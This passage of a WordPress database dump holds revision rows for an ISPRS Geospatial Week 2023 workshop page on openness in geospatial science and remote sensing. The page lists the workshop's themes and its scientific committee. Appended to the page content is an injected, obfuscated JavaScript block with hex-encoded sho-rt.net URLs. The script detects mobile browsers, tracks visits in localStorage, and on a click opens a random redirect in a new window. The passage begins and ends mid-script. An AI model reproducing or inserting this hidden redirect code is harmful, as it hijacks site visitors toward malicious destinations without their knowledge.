_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Openness in Geospatial and Remote Sensing</strong>','','inherit','closed','closed','','3497-revision-v1','','','2023-01-01 19:25:28','2023-01-01 19:25:28','',3497,'https://gsw2023.com/?p=3521',0,'revision','',0),
(3522,1,'2023-01-01 19:26:02','2023-01-01 19:26:02','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3499\" img_size=\"600x600\" alignment=\"center\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\"><strong>Openness helps improve access, use, reuse, and delivery of trustworthy information and data, foster innovation, shape new policies and enrich the delivery of services for societal needs in a more open and transparent manner. In the Geospatial and Remote Sensing domains, the concept of Openness is at the core of several initiatives, from policies and legal interventions in the field of Spatial Data Infrastructures (SDIs) such as e.g., the European INSPIRE Directive, to publicly-funded programmes like Copernicus, international partnerships such as the Group on Earth Observation (GEO), research approaches fostering open science, and community-led projects such as Pangeo, OpenStreetMap and the UN OpenGIS Initiative. The concept of Openness is based on three main elements: Accessibility (of data, software, standards and information), Inclusiveness (growing participation of diverse communities and partnerships between different actors: public sector, private sector, academia and citizens), and Reproducibility (effective sharing and reuse of resources and collaboration through open software tools, frameworks, libraries and open infrastructures).</strong></h5>\n<h5 style=\"text-align: justify;\"><strong>This workshop aims at bringing together experts in Open Source for Geospatial and Open Earth Observation Science and Applications to: i) discuss the advancements in the fields of open source software, open standards, open science, open innovation and open educational resources in the Geospatial and Remote Sensing domains; ii) explore new technology developments that enable Openness in Geospatial and Remote Sensing; iii) evaluate how Openness contributes to scientific advancements; and iv) showcase applications that build upon open principles to deliver products and information with societal benefits. We welcome all types of papers addressing the above, including research papers, review papers as well as papers presenting new technology, approaches and case studies and highlighting the originality compared to the state of the art. We especially welcome papers that – to the maximum extent possible – are reproducible, i.e. make all artefacts (input data, computational steps, methods and code) openly available so that consistent results can be achieved. When available, the code used in the research work shall be released under an open source license.</strong></h5>\n<h5 style=\"text-align: justify;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023, and is organised by the ISPRS ICWG IV/III/II Openness in Geospatial Science and Remote Sensing. It will be a one-day single-track workshop of oral presentations and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission – Joint Research Centre (JRC), Italy</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"100px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Openness in Geospatial and Remote Sensing</strong>','','inherit','closed','closed','','3497-revision-v1','','','2023-01-01 19:26:02','2023-01-01 19:26:02','',3497,'https://gsw2023.com/?p=3522',0,'revision','',0),
(3523,1,'2023-01-01 19:26:45','2023-01-01 19:26:45','<p>[vc_row][vc_column width=\"1/4\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][vc_single_image image=\"3499\" img_size=\"600x600\" alignment=\"center\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\"><strong>Openness helps improve access, use, reuse, and delivery of trustworthy information and data, foster innovation, shape new policies and enrich the delivery of services for societal needs in a more open and transparent manner. In the Geospatial and Remote Sensing domains, the concept of Openness is at the core of several initiatives, from policies and legal interventions in the field of Spatial Data Infrastructures (SDIs) such as e.g., the European INSPIRE Directive, to publicly-funded programmes like Copernicus, international partnerships such as the Group on Earth Observation (GEO), research approaches fostering open science, and community-led projects such as Pangeo, OpenStreetMap and the UN OpenGIS Initiative. The concept of Openness is based on three main elements: Accessibility (of data, software, standards and information), Inclusiveness (growing participation of diverse communities and partnerships between different actors: public sector, private sector, academia and citizens), and Reproducibility (effective sharing and reuse of resources and collaboration through open software tools, frameworks, libraries and open infrastructures).</strong></h5>\n<h5 style=\"text-align: justify;\"><strong>This workshop aims at bringing together experts in Open Source for Geospatial and Open Earth Observation Science and Applications to: i) discuss the advancements in the fields of open source software, open standards, open science, open innovation and open educational resources in the Geospatial and Remote Sensing domains; ii) explore new technology developments that enable Openness in Geospatial and Remote Sensing; iii) evaluate how Openness contributes to scientific advancements; and iv) showcase applications that build upon open principles to deliver products and information with societal benefits. We welcome all types of papers addressing the above, including research papers, review papers as well as papers presenting new technology, approaches and case studies and highlighting the originality compared to the state of the art. We especially welcome papers that – to the maximum extent possible – are reproducible, i.e. make all artefacts (input data, computational steps, methods and code) openly available so that consistent results can be achieved. When available, the code used in the research work shall be released under an open source license.</strong></h5>\n<h5 style=\"text-align: justify;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023, and is organised by the ISPRS ICWG IV/III/II Openness in Geospatial Science and Remote Sensing. It will be a one-day single-track workshop of oral presentations and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission – Joint Research Centre (JRC), Italy</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"100px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 